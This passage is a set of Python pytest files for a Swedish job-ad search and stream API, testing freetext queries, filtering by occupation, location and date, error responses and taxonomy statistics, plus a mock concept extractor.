('kock bagare Stockholm Göteborg', '24274093', 1),
('kallskänka kock Stockholm Göteborg', '24274093', 1),
('lärare lågstadielärare Malmö Göteborg', '24439613', 9),
])
def test_freetext_two_work_and_two_locations(session, query, top_id, expected_number_of_hits):
"""
    Test that the top hit for a search has not changed and that the number of hits for the query has not changed.
    This documents current behavior.
"""
params = {'q': query, 'limit': '100'}
response = get_search_check_number_of_results(session, expected_number_of_hits, params)
response_json = json.loads(response.content.decode('utf8'))
if TEST_USE_STATIC_DATA:
assert response_json['hits'][0]['id'] == top_id
@pytest.mark.skipif(not TEST_USE_STATIC_DATA, reason="depends on a fixed set of ads")
@pytest.mark.integration
@pytest.mark.parametrize("query, expected_number, top_id", [
('Bauhaus Kundtjänst', 38, '24419003'),
('Sirius crew', 2, '24416669'),
('super', 6, '24361060'),
('Säsong', 2, '24404500'),
])
def test_freetext_search(session, query, expected_number, top_id):
"""
    Tests from examples.
    Test that specific queries return the expected number of hits, that the expected top hit comes first (identified by id),
    and that freetext concepts are not included in the search result.
"""
params = {'q': query, 'limit': '40'}
response = get_search_check_number_of_results(session, expected_number=expected_number, params=params)
response_json = json.loads(response.content.decode('utf8'))
# freetext concepts should be empty
check_freetext_concepts(response_json['freetext_concepts'], [[], [], [], [], [], [], [], [], []])
if TEST_USE_STATIC_DATA:
assert response_json['hits'][0]['id'] == top_id
@pytest.mark.skipif(not TEST_USE_STATIC_DATA, reason="depends on a fixed set of ads")
def test_search_rules(session):
params = {'q': "systemutvecklare python java stockholm sopra", 'limit': '1'}
response_json = get_search(session, params=params)
hit = response_json['hits'][0]
check_freetext_concepts(response_json['freetext_concepts'],
[['python', 'java'], ['systemutvecklare'], ['stockholm'], [], [], [], [], [], []])
assert 'sopra' in hit['employer']['name'].lower()
assert 'sopra' in hit['employer']['workplace'].lower()
assert 'systemutvecklare' in hit['occupation']['label'].lower()
assert hit['workplace_address']['municipality'] == 'Stockholm'
```
#### File: api_tests/stream/test_stream_errors.py
```python
import pytest
import requests
import tests.test_resources
from sokannonser.settings import LOCATION_CONCEPT_ID, OCCUPATION_CONCEPT_ID, ABROAD
from tests.test_resources.concept_ids import concept_ids_geo as geo, occupation as work, occupation_group as group
from tests.test_resources.helper import get_stream_expect_error, get_stream_check_number_of_results, get_stream, \
check_ads_for_country_in_address
from tests.test_resources.settings import DAWN_OF_TIME
@pytest.mark.parametrize("wrong_date", ['2020-13-25T00:00:00', '20-00-25T00:00:00', '0001-00-01', 'T11:28:00'])
def test_wrong_date_format(session_stream, wrong_date):
get_stream_expect_error(session_stream, params={'date': wrong_date}, expected_http_code=requests.codes.bad_request)
@pytest.mark.parametrize('path', ['/stream', '/snapshot'])
def test_filter_wrong_api_key_expect_unauthorized_response(session_stream, path):
"""
    test that an 'unauthorized' response (http 401) is returned when doing a request with an incorrect api key
"""
session_stream.headers.update({'api-key': 'wrong key'})
params = {LOCATION_CONCEPT_ID: geo.stockholm}
expected_http_code = requests.codes.unauthorized
try:
get_stream_expect_error(session_stream, params, expected_http_code)
finally: # restore headers in session_stream object
session_stream.headers.update(tests.test_resources.settings.headers_stream)
@pytest.mark.parametrize('type, value', [
(OCCUPATION_CONCEPT_ID, work.bartender),
(LOCATION_CONCEPT_ID, geo.stockholm)])
def test_filter_without_date_expect_bad_request_response(session_stream, type, value):
"""
    test that a 'bad request' response (http 400) is returned when doing a request without a date parameter
"""
get_stream_expect_error(session_stream, params={type: value}, expected_http_code=requests.codes.bad_request)
@pytest.mark.parametrize('work, expected_number_of_hits', [
(group.mjukvaru__och_systemutvecklare_m_fl_, 88),
(group.mjukvaru__och_systemutvecklare_m_fl_.lower(), 0)])
def test_filter_with_lowercase_concept_id(session_stream, work, expected_number_of_hits):
"""
compare correct concept_id with a lower case version
"""
params = {'date': DAWN_OF_TIME, OCCUPATION_CONCEPT_ID: work}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize("abroad", [True, False])
def test_work_abroad(session, abroad):
"""
Check that param 'arbete-utomlands' returns http 400 BAD REQUEST for stream
"""
get_stream_expect_error(session, {ABROAD: abroad}, expected_http_code=requests.codes.bad_request)
```
#### File: api_tests/stream/test_stream_filter.py
```python
import pytest
from sokannonser.settings import OCCUPATION_CONCEPT_ID, LOCATION_CONCEPT_ID, UPDATED_BEFORE_DATE
from tests.test_resources.settings import NUMBER_OF_ADS, DAWN_OF_TIME, current_time_stamp
import tests.test_resources.concept_ids.concept_ids_geo as geo
import tests.test_resources.concept_ids.occupation as work
import tests.test_resources.concept_ids.occupation_group as group
import tests.test_resources.concept_ids.occupation_field as field
from tests.test_resources.helper import get_stream_check_number_of_results
@pytest.mark.parametrize('date, work, expected_number_of_hits', [
(DAWN_OF_TIME, group.arbetsformedlare, 7),
(DAWN_OF_TIME, group.apotekare, 0),
(DAWN_OF_TIME, group.mjukvaru__och_systemutvecklare_m_fl_, 88),
(DAWN_OF_TIME, work.mjukvaruutvecklare, 20),
(DAWN_OF_TIME, work.arbetsterapeut, 3)])
def test_filter_only_on_occupation(session_stream, date, work, expected_number_of_hits):
"""
    Returns the number of hits in the db. Temporary, used to verify results in other tests
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: work}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, geo, expected_number_of_hits', [
(DAWN_OF_TIME, geo.aland_tillhor_finland, 0),
(DAWN_OF_TIME, geo.norge, 4),
(DAWN_OF_TIME, geo.malta, 0),
(DAWN_OF_TIME, geo.schweiz, 1),
(DAWN_OF_TIME, geo.kalmar_lan, 38),
(DAWN_OF_TIME, geo.botkyrka, 6),
(DAWN_OF_TIME, geo.stockholms_lan, 410),
(DAWN_OF_TIME, geo.stockholm, 285),
(DAWN_OF_TIME, geo.sverige, 1485)])
def test_filter_only_on_location(session_stream, date, geo, expected_number_of_hits):
"""
    Returns the number of hits in the db. Temporary, used to verify results in other tests
"""
params = {'date': date, LOCATION_CONCEPT_ID: geo}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, work, geo, expected_number_of_hits', [
(DAWN_OF_TIME, work.larare_i_fritidshem_fritidspedagog, geo.vastra_gotalands_lan, 2),
('2020-12-15T00:00:01', work.larare_i_fritidshem_fritidspedagog, geo.vastra_gotalands_lan, 1),
('2020-12-01T00:00:01', work.servitor_servitris__kafe_och_konditori, geo.sverige, 0),
('2020-12-01T00:00:01', work.bussforare_busschauffor, geo.sverige, 2),
('2020-12-01T00:00:01', work.larare_i_grundskolan__arskurs_7_9, geo.stockholms_lan, 3),
(DAWN_OF_TIME, group.grundutbildade_sjukskoterskor, geo.sverige, 104),
(DAWN_OF_TIME, group.mjukvaru__och_systemutvecklare_m_fl_, geo.sverige, 88),
(DAWN_OF_TIME, group.mjukvaru__och_systemutvecklare_m_fl_, geo.schweiz, 0),
('2020-11-01T00:00:01', group.mjukvaru__och_systemutvecklare_m_fl_, geo.sverige, 81),
('2020-12-01T00:00:01', field.militart_arbete, geo.schweiz, 0),
(DAWN_OF_TIME, field.militart_arbete, geo.sverige, 6),
(DAWN_OF_TIME, field.halso__och_sjukvard, geo.sverige, 269),
(DAWN_OF_TIME, field.halso__och_sjukvard, geo.stockholms_lan, 55),
('2020-11-25T00:00:01', field.halso__och_sjukvard, geo.sverige, 220),
('2020-12-15T00:00:01', field.halso__och_sjukvard, geo.stockholms_lan, 18),
])
def test_filter_with_date_and_occupation_and_location(session_stream, date, work, geo,
expected_number_of_hits):
"""
should return results based on date AND occupation type AND location
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: work, LOCATION_CONCEPT_ID: geo}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, concept_id, expected_number_of_hits', [
(DAWN_OF_TIME, work.personlig_assistent, 48),
('2020-11-01T00:00:01', work.personlig_assistent, 42),
('2020-12-01T00:00:01', work.personlig_assistent, 30),
('2020-12-15T00:00:01', work.personlig_assistent, 9),
('2021-01-01T00:00:01', work.personlig_assistent, 0),
(DAWN_OF_TIME, work.kassapersonal, 3),
('2020-12-01T00:00:01', work.kassapersonal, 2),
(DAWN_OF_TIME, work.mjukvaruutvecklare, 20),
('2020-10-25T00:00:00', work.mjukvaruutvecklare, 18),
('2020-11-25T00:00:00', work.mjukvaruutvecklare, 14),
('2020-12-15T00:00:00', work.mjukvaruutvecklare, 6),
(DAWN_OF_TIME, group.arbetsformedlare, 7),
('2020-03-25T00:00:00', group.arbetsformedlare, 7),
(DAWN_OF_TIME, field.militart_arbete, 6),
(DAWN_OF_TIME, field.socialt_arbete, 111),
(DAWN_OF_TIME, work.administrativ_chef, 4),
(DAWN_OF_TIME, work.account_manager, 13),
(DAWN_OF_TIME, work.cykelbud, 1),
])
def test_filter_with_date_and_one_occupation(session_stream, date, concept_id, expected_number_of_hits):
"""
test of filtering in /stream: should return results based on date AND occupation-related concept_id
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: concept_id}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, geo, expected_number_of_hits', [
(DAWN_OF_TIME, geo.falun, 9),
(DAWN_OF_TIME, geo.stockholms_lan, 410),
('2020-12-01T00:00:01', geo.stockholms_lan, 297),
('2020-12-05T00:00:01', geo.stockholms_lan, 263),
(DAWN_OF_TIME, geo.norge, 4),
('2020-11-01T00:00:01', geo.hallands_lan, 36),
('2020-11-01T00:00:01', geo.linkoping, 31),
(DAWN_OF_TIME, geo.sverige, 1485),
('2020-11-01T00:00:01', geo.sverige, 1387),
('2020-12-15T00:00:01', geo.sverige, 551),
('2020-12-01T00:00:01', geo.stockholm, 202),
('2020-12-01T00:00:01', geo.schweiz, 1),
('2020-12-01T00:00:01', geo.norge, 4),
('2020-11-01T00:00:01', geo.dalarnas_lan, 30),
('2020-12-01T00:00:01', geo.dalarnas_lan, 26),
('2020-12-15T00:00:01', geo.dalarnas_lan, 12)])
def test_filter_with_date_and_location(session_stream, date, geo, expected_number_of_hits):
"""
    should return results based on date AND location
"""
params = {'date': date, LOCATION_CONCEPT_ID: geo}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
# multiple params of same type
@pytest.mark.parametrize('date, work_1, work_2, expected_number_of_hits', [
(DAWN_OF_TIME, work.account_manager, work.cykelbud, 14),
(DAWN_OF_TIME, work.mjukvaruutvecklare, group.arbetsformedlare, 27),
(DAWN_OF_TIME, work.cykelbud, work.account_manager, 14),
('2020-11-01T00:00:01', work.mjukvaruutvecklare, group.arbetsformedlare, 25),
('2020-12-01T00:00:01', work.mjukvaruutvecklare, group.arbetsformedlare, 17),
(DAWN_OF_TIME, work.administrativ_chef, field.militart_arbete, 10),
(DAWN_OF_TIME, field.militart_arbete, work.administrativ_chef, 10),
('2020-11-01T00:00:01', group.bagare_och_konditorer, group.bartendrar, 2),
(DAWN_OF_TIME, group.bagare_och_konditorer, group.bartendrar, 3),
('2020-11-11T00:00:01', group.apotekare, field.data_it, 129),
('2020-12-12T00:00:01', group.apotekare, field.data_it, 66),
('2020-11-25T00:00:00', group.frisorer, work.akupunktor, 2),
('2020-11-25T00:00:00', field.pedagogiskt_arbete, field.halso__och_sjukvard, 338),
('2020-12-15T00:00:00', field.hantverksyrken, group.hudterapeuter, 3),
('2020-11-25T00:00:00', field.socialt_arbete, work.databasutvecklare, 92)])
def test_filter_with_date_and_two_occupations(session_stream, date, work_1, work_2,
expected_number_of_hits):
"""
test of filtering in /stream with date and 2 occupation-related concept_ids
should return results based on both date AND (work_1 OR work_2)
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: [work_1, work_2]}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, work_1, work_2, work_3, expected_number_of_hits', [
(DAWN_OF_TIME, work.account_manager, work.cykelbud, work.databasutvecklare, 15),
('2020-11-01T00:00:01', work.mjukvaruutvecklare, work.databasutvecklare, group.arbetsformedlare, 26),
('2020-12-01T00:00:01', work.administrativ_chef, work.apotekschef, field.militart_arbete, 10),
('2020-11-01T00:00:01', group.bagare_och_konditorer, group.bartendrar, group.hovmastare_och_servitorer, 4),
('2020-12-01T00:00:01', group.apotekare, group.ambulanssjukskoterskor_m_fl_, field.data_it, 108),
('2020-11-25T00:00:00', group.frisorer, group.hudterapeuter, work.akupunktor, 2),
(DAWN_OF_TIME, field.pedagogiskt_arbete, field.halso__och_sjukvard, field.kropps__och_skonhetsvard, 416),
('2020-11-25T00:00:00', field.pedagogiskt_arbete, field.halso__och_sjukvard, field.kropps__och_skonhetsvard, 342),
(DAWN_OF_TIME, field.hantverksyrken, field.data_it, group.hudterapeuter, 162),
('2020-11-25T00:00:00', field.hantverksyrken, field.data_it, group.hudterapeuter, 122),
(DAWN_OF_TIME, field.socialt_arbete, field.bygg_och_anlaggning, work.databasutvecklare, 184),
('2020-11-25T00:00:00', field.socialt_arbete, field.bygg_och_anlaggning, work.databasutvecklare, 153)
])
def test_filter_with_date_and_three_occupations(session_stream, date, work_1, work_2, work_3,
expected_number_of_hits):
"""
    test of filtering in /stream with date and 3 occupation-related concept_ids
    should return results based on date AND (work_1 OR work_2 OR work_3)
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: [work_1, work_2, work_3]}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params=params)
@pytest.mark.smoke
@pytest.mark.parametrize('date, work_1, work_2, geo_1, expected_number_of_hits', [
(DAWN_OF_TIME, work.arbetsterapeut, work.bussforare_busschauffor, geo.sverige, 5),
(DAWN_OF_TIME, work.arbetsterapeut, group.apotekare, geo.vastra_gotalands_lan, 0),
(DAWN_OF_TIME, work.arbetsterapeut, field.kropps__och_skonhetsvard, geo.norge, 0),
(DAWN_OF_TIME, work.arbetsterapeut, field.kropps__och_skonhetsvard, geo.sverige, 11),
(DAWN_OF_TIME, group.grundutbildade_sjukskoterskor, group.grundutbildade_sjukskoterskor, geo.sverige, 104),
(DAWN_OF_TIME, group.apotekare, group.hovmastare_och_servitorer, geo.stockholms_lan, 1),
(DAWN_OF_TIME, group.apotekare, group.arbetsformedlare, geo.sverige, 7),
('2020-12-01T00:00:01', field.militart_arbete, field.hantverksyrken, geo.stockholm, 2),
('2020-12-01T00:00:01', field.militart_arbete, group.ambulanssjukskoterskor_m_fl_, geo.sverige, 8),
('2020-12-01T00:00:01', field.militart_arbete, work.bussforare_busschauffor, geo.norge, 0)])
def test_filter_with_date_and_two_occupations_and_location(session_stream, date, work_1, work_2, geo_1,
expected_number_of_hits):
"""
should return results based on date AND location AND (work_1 OR work_2)
results = work_1 + work_2 that matches location
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: [work_1, work_2], LOCATION_CONCEPT_ID: geo_1}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, geo_1, geo_2, expected_number_of_hits', [
(DAWN_OF_TIME, geo.arboga, geo.falun, 11),
(DAWN_OF_TIME, geo.arboga, geo.stockholms_lan, 412),
(DAWN_OF_TIME, geo.arboga, geo.norge, 6),
('2020-11-01T00:00:01', geo.dalarnas_lan, geo.hallands_lan, 66),
('2020-11-01T00:00:01', geo.dalarnas_lan, geo.linkoping, 61),
('2020-11-01T00:00:01', geo.dalarnas_lan, geo.sverige, 1387),
('2020-12-01T00:00:01', geo.schweiz, geo.stockholm, 203),
('2020-12-01T00:00:01', geo.schweiz, geo.jonkopings_lan, 39),
('2020-12-01T00:00:01', geo.schweiz, geo.norge, 5),
('2020-11-01T00:00:01', geo.dalarnas_lan, geo.schweiz, 31),
('2020-12-01T00:00:01', geo.schweiz, geo.norge, 5)])
def test_filter_with_date_and_two_locations(session_stream, date, geo_1, geo_2, expected_number_of_hits):
"""
should return results based on date AND occupation type AND (location_1 OR location_2)
"""
params = {'date': date, LOCATION_CONCEPT_ID: [geo_1, geo_2]}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, geo_list, expected_number_of_hits', [
(DAWN_OF_TIME, [geo.stockholms_lan], 410),
(DAWN_OF_TIME, [geo.stockholms_lan, geo.solna], 410),
(DAWN_OF_TIME, [geo.stockholms_lan, geo.stockholm, geo.botkyrka], 410),
(DAWN_OF_TIME, [geo.stockholms_lan, geo.stockholm, geo.botkyrka, geo.solna, geo.nacka], 410)])
def test_filter_with_date_and_multiple_locations_in_same_region(session_stream, date, geo_list,
expected_number_of_hits):
"""
    should return results based on date AND (location_1 OR location_2 OR ...);
    adding municipalities that already belong to an included region does not change the number of hits
"""
params = {'date': date, LOCATION_CONCEPT_ID: geo_list}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, work_list, expected_number_of_hits', [
(DAWN_OF_TIME, [field.halso__och_sjukvard], 270),
(DAWN_OF_TIME, [field.halso__och_sjukvard, work.sjukskoterska__grundutbildad], 270),
(DAWN_OF_TIME, [field.halso__och_sjukvard, group.grundutbildade_sjukskoterskor], 270),
(DAWN_OF_TIME,
[field.halso__och_sjukvard, group.grundutbildade_sjukskoterskor, group.ambulanssjukskoterskor_m_fl_,
work.sjukskoterska__medicin_och_kirurgi], 270)])
def test_filter_with_date_and_multiple_occupations_within_same_field(session_stream, date, work_list,
expected_number_of_hits):
"""
    should return results based on date AND (occupation_1 OR occupation_2 OR ...);
    adding occupations or groups that already belong to an included field does not change the number of hits
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: work_list}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, work_list, expected_number_of_hits', [
(DAWN_OF_TIME, [field.halso__och_sjukvard], 270),
(DAWN_OF_TIME, [group.grundutbildade_sjukskoterskor], 105),
(DAWN_OF_TIME, [work.sjukskoterska__grundutbildad], 103)
])
def test_filter_narrowing_down_occupations_within_same_field(session_stream, date, work_list,
expected_number_of_hits):
"""
    should return results based on date AND the occupation concept id;
    narrowing from field to group to a single occupation reduces the number of hits
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: work_list}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, work, geo_1, geo_2, expected_number_of_hits', [
(DAWN_OF_TIME, work.arbetsterapeut, geo.arboga, geo.falun, 0),
(DAWN_OF_TIME, work.arbetsterapeut, geo.vastra_gotalands_lan, geo.ostergotlands_lan, 0),
(DAWN_OF_TIME, group.civilingenjorsyrken_inom_bygg_och_anlaggning, geo.dalarnas_lan, geo.hallands_lan, 0),
(DAWN_OF_TIME, group.civilingenjorsyrken_inom_bygg_och_anlaggning, geo.dalarnas_lan, geo.linkoping, 0),
(DAWN_OF_TIME, group.civilingenjorsyrken_inom_bygg_och_anlaggning, geo.malta, geo.sverige, 12),
('2020-12-01T00:00:01', field.kultur__media__design, geo.schweiz, geo.stockholm, 5),
('2020-12-01T00:00:01', field.naturvetenskapligt_arbete, geo.schweiz, geo.stockholms_lan, 4),
('2020-12-01T00:00:01', field.bygg_och_anlaggning, geo.schweiz, geo.norge, 1),
(DAWN_OF_TIME, group.mjukvaru__och_systemutvecklare_m_fl_, geo.vastra_gotalands_lan, geo.schweiz, 16),
('2020-02-01T00:00:01', work.bussforare_busschauffor, geo.schweiz, geo.norge,0)])
def test_filter_with_date_and_occupation_and_two_locations(session_stream, date, work, geo_1, geo_2,
expected_number_of_hits):
"""
should return results based on date AND occupation type AND (location_1 OR location_2)
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: work, LOCATION_CONCEPT_ID: [geo_1, geo_2]}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, work_1, work_2, geo_1, geo_2, expected_number_of_hits', [
(DAWN_OF_TIME, work.databasutvecklare, work.arbetsterapeut, geo.goteborg, geo.falun, 0),
(DAWN_OF_TIME, work.databasutvecklare, work.sjukskoterska__grundutbildad, geo.arboga, geo.falun, 4),
(DAWN_OF_TIME, group.mjukvaru__och_systemutvecklare_m_fl_, work.arbetsterapeut, geo.arboga, geo.stockholms_lan, 37),
(DAWN_OF_TIME, work.farmaceut_apotekare, group.kassapersonal_m_fl_, geo.dalarnas_lan, geo.hallands_lan, 0),
(DAWN_OF_TIME, work.sjukskoterska__grundutbildad, group.apotekare, geo.dalarnas_lan, geo.linkoping,6),
(DAWN_OF_TIME, work.barnsjukskoterska, group.apotekare, geo.malta, geo.sverige, 1),
('2020-12-01T00:00:01', work.eltekniker, field.kultur__media__design, geo.schweiz, geo.stockholm, 5),
('2020-12-01T00:00:01', work.butikssaljare__fackhandel, field.naturvetenskapligt_arbete, geo.schweiz,
geo.stockholms_lan, 8),
('2020-12-01T00:00:01', group.gymnasielarare, field.bygg_och_anlaggning, geo.schweiz, geo.norge, 1),
('2020-12-01T00:00:01', group.grundutbildade_sjukskoterskor, field.bygg_och_anlaggning, geo.schweiz, geo.norge, 2),
('2020-12-01T00:00:01', group.grundutbildade_sjukskoterskor, field.halso__och_sjukvard, geo.schweiz, geo.norge, 1),
(DAWN_OF_TIME, work.bygg__och_anlaggningsforare, group.mjukvaru__och_systemutvecklare_m_fl_, geo.dalarnas_lan,
geo.schweiz, 0),
('2020-12-01T00:00:01', field.halso__och_sjukvard, work.bussforare_busschauffor, geo.schweiz, geo.norge, 1)])
def test_filter_with_date_and_two_occupations_and_two_locations(session_stream, date, work_1, work_2, geo_1,
geo_2,
expected_number_of_hits):
"""
should return results based on date AND (occupation 1 OR occupation 2) AND (location_1 OR location_2)
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: [work_1, work_2], LOCATION_CONCEPT_ID: [geo_1, geo_2]}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
# test below for comparison of number of hits for different dates
@pytest.mark.parametrize('date, expected_number_of_hits', [
(DAWN_OF_TIME, NUMBER_OF_ADS),
('2020-10-01T00:00:01', 1439),
('2020-11-01T00:00:01', 1397),
('2020-11-25T00:00:00', 1249),
('2020-12-01T00:00:00', 1146),
('2020-12-05T00:00:00', 985),
('2020-12-10T00:00:00', 778),
('2020-12-15T00:00:00', 554),
('2020-12-20T00:00:00', 168),
('2020-12-21T00:00:00', 161),
('2020-12-22T00:00:00', 28),
('2020-12-22T12:00:00', 6),
('2020-12-22T12:30:40', 1),
('2020-12-23T00:00:00', 0),
])
def test_filter_only_on_date(session_stream, date, expected_number_of_hits):
"""
    Test basic stream with filtering on date (updated after this date)
"""
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params={'date': date})
@pytest.mark.parametrize('from_date, to_date, expected_number_of_hits', [
# 1 verify that results are the same as when only using a single date
(DAWN_OF_TIME, current_time_stamp, NUMBER_OF_ADS),
('2020-10-01T00:00:01', '2021-04-30T00:00:00', 1439),
('2020-11-01T00:00:01', '2021-04-30T00:00:00', 1397),
('2020-11-15T00:00:00', '2021-04-30T00:00:00', 1339),
('2020-11-20T00:00:00', '2021-04-30T00:00:00', 1301),
('2020-11-30T00:00:00', '2021-04-30T00:00:00', 1171),
('2020-12-05T00:00:00', '2021-04-30T00:00:00', 985),
('2020-12-10T00:00:00', '2021-04-30T00:00:00', 778),
('2020-12-15T00:00:00', '2021-04-30T00:00:00', 554),
('2020-12-20T00:00:00', '2021-04-30T00:00:00', 168),
('2020-12-30T08:29:41', '2021-04-30T00:00:00', 0),
('2020-11-25T00:00:00', '2021-11-25T00:00:00', 1249),
('2020-12-14T00:00:00', '2021-03-30T00:00:00', 649),
('2020-12-14T00:00:00', '2020-12-16T00:00:00', 176),
('2020-11-14T00:00:00', '2020-11-20T00:00:00',39),
('2020-11-25T00:00:00', '2020-11-30T00:00:00', 78),
('2020-11-26T00:00:00', '2020-11-30T00:00:00', 52),
('2020-12-10T00:00:00', '2020-12-15T00:00:00', 224),
('2020-12-12T00:00:00', '2020-12-15T00:00:00', 103),
('2020-12-15T00:00:00', '2020-12-16T00:00:00', 81),
('2020-12-16T00:00:00', '2020-12-17T10:00:00', 101),
('2020-12-22T00:00:00', '2020-12-23T10:00:00', 28),
(DAWN_OF_TIME, '2021-04-30T10:00:00', NUMBER_OF_ADS),
(DAWN_OF_TIME, current_time_stamp, NUMBER_OF_ADS),
# reverse order should return 0 results without errors
(current_time_stamp, DAWN_OF_TIME, 0)
])
def test_filter_on_date_interval(session_stream, from_date, to_date, expected_number_of_hits):
"""
Test stream with filtering on date interval.
"""
params = {'date': from_date, UPDATED_BEFORE_DATE: to_date}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
```
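The interval tests above combine the `date` parameter with `UPDATED_BEFORE_DATE`. The `get_stream_check_number_of_results` helper is not part of this dump; below is a plausible sketch of it, under the assumptions that a `STREAM_URL` constant exists in the test settings, that the stream endpoint lives under a `/stream` path, and that it returns a JSON array of ads.

```python
# Hypothetical sketch of the get_stream_check_number_of_results helper used above.
# STREAM_URL and the JSON-array response shape are assumptions for illustration;
# the real helper lives in tests/test_resources/helper.py (not shown).
from tests.test_resources.settings import STREAM_URL  # assumed to exist


def get_stream_check_number_of_results(session, expected_number, params):
    response = session.get(f"{STREAM_URL}/stream", params=params)
    response.raise_for_status()
    ads = response.json()
    assert len(ads) == expected_number, f"Expected {expected_number} but got {len(ads)}"
    return ads
```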
#### File: integration_tests/search/test_taxonomy.py
```python
import logging
import pytest
from sokannonser.repository import taxonomy as t
from sokannonser.repository import platsannonser
import re
log = logging.getLogger(__name__)
tax_stat = [[t.OCCUPATION], [t.GROUP], [t.FIELD], [t.SKILL]]
tax_other = [[t.MUNICIPALITY], [t.REGION]]
tax_noexist = [[' ', 'blabla', '']]
@pytest.mark.parametrize("taxonomy_type", tax_stat + tax_other + tax_noexist)
def test_get_stats_for_taxonomy_type(taxonomy_type):
if taxonomy_type not in tax_stat:
try:
platsannonser.get_stats_for(taxonomy_type)
except KeyError as e:
print('KeyError exception. Reason: taxonomy type %s' % str(e))
assert "'" + taxonomy_type + "'" == str(e)
except Exception as ex:
pytest.fail('ERROR: This is not a KeyError exception: %s (%s)' %
(str(ex), taxonomy_type), pytrace=False)
else: # taxonomy_type is in 5 mentioned in platsannonser.py::get_stats_for()
for k, v in platsannonser.get_stats_for(taxonomy_type).items():
            assert (re.match(r'^[\w\d_-]*$', k) is not None)  # check k is a concept id string (word chars, digits, dashes)
assert isinstance(v, int) # check v is int
@pytest.mark.parametrize("taxonomy_type", (tax_noexist))
def test_get_stats_for_taxonomy_type_neg(taxonomy_type):
assert platsannonser.get_stats_for(taxonomy_type) == {}
@pytest.mark.parametrize("taxonomy_type", tax_other)
def test_get_stats_for_taxonomy_type_other(taxonomy_type):
assert platsannonser.get_stats_for(taxonomy_type) != {}
@pytest.mark.parametrize("v", ['a', 'abc', '-1'])
def test_is_char_as_str(v):
with pytest.raises(AssertionError):
is_int(v)
@pytest.mark.parametrize("v", ['1', '0', '10000'])
def test_is_int_as_str(v):
is_int(v)
@pytest.mark.parametrize("v", [0, 1, 1000])
def test_is_int_as_int(v):
with pytest.raises(TypeError):
is_int(v)
def is_int(value):
assert (re.match(r'[0-9]+$', value) is not None)
```
#### File: integration_tests/test_resources/mock_for_querybuilder_tests.py
```python
import logging
import pytest
import sys
from dateutil import parser
from sokannonser import settings
from sokannonser.repository.querybuilder import QueryBuilder
from sokannonser.repository import taxonomy
log = logging.getLogger(__name__)
class MockOntology:
def __init__(self):
self.extracted_locations = set()
class MockTextToConcept:
def __init__(self):
self.ontology = MockOntology()
def text_to_concepts(self, text):
skills = {
"python": {
"term": "python",
"uuid": "0b6d3a08-3cc3-546d-b8ed-f2de299bafdb",
"concept": "Python",
"type": "KOMPETENS",
"term_uuid": "f60fa7fd-00f7-5803-acd7-1a3eda170397",
"term_misspelled": False,
"plural_occupation": False,
"definite_occupation": False,
"version": "SYNONYM-DIC-2.0.1.25",
"operator": ""
},
"java": {
"term": "java",
"uuid": "c965e8aa-751a-5923-97bd-b8bd6d5e813a",
"concept": "Java",
"type": "KOMPETENS",
"term_uuid": "e3d2a75a-5717-56d2-ad8a-ee4b5baf8530",
"term_misspelled": False,
"plural_occupation": False,
"definite_occupation": False,
"version": "SYNONYM-DIC-2.0.1.25",
"operator": "+"
},
"php": {
"term": "php",
"uuid": "3e3629d1-95f6-5b0e-8f5c-d6a709fd94e2",
"concept": "Php",
"type": "KOMPETENS",
"term_uuid": "216af07e-d210-572f-8885-b13d79b80acc",
"term_misspelled": False,
"plural_occupation": False,
"definite_occupation": False,
"version": "SYNONYM-DIC-2.0.1.25",
"operator": "-"
}
}
occupations = {
"systemutvecklare": {
"term": "systemutvecklare",
"uuid": "df9e7a73-2cc3-5b32-a84e-7e68a527e80e",
"concept": "Systemutvecklare",
"type": "YRKE",
"term_uuid": "7296755c-acf2-5eed-9d4b-e4cd845cd05a",
"term_misspelled": False,
"plural_occupation": False,
"definite_occupation": False,
"version": "SYNONYM-DIC-2.0.1.25",
"operator": ""
}
}
response = {
"skill": [],
"occupation": [],
"trait": [],
"location": [],
"skill_must": [],
"occupation_must": [],
"trait_must": [],
"location_must": [],
"skill_must_not": [],
"occupation_must_not": [],
"trait_must_not": [],
"location_must_not": []
}
for word in text.split():
if word.startswith("+"):
word = word[1:]
if word in skills:
response['skill_must'].append(skills[word])
if word in occupations:
response['occupation_must'].append(occupations[word])
elif word.startswith("-"):
word = word[1:]
if word in skills:
response['skill_must_not'].append(skills[word])
if word in occupations:
response['occupation_must_not'].append(occupations[word])
else:
if word in skills:
response['skill'].append(skills[word])
if word in occupations:
response['occupation'].append(occupations[word])
return response
```
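A quick, hypothetical illustration (not part of the repository) of how the mock above buckets query terms by operator; the expected concepts follow directly from the word tables in the mock:
```python
# Illustrative only: assumes MockTextToConcept from the file above is in scope.
mock = MockTextToConcept()
concepts = mock.text_to_concepts("systemutvecklare +java -php python")
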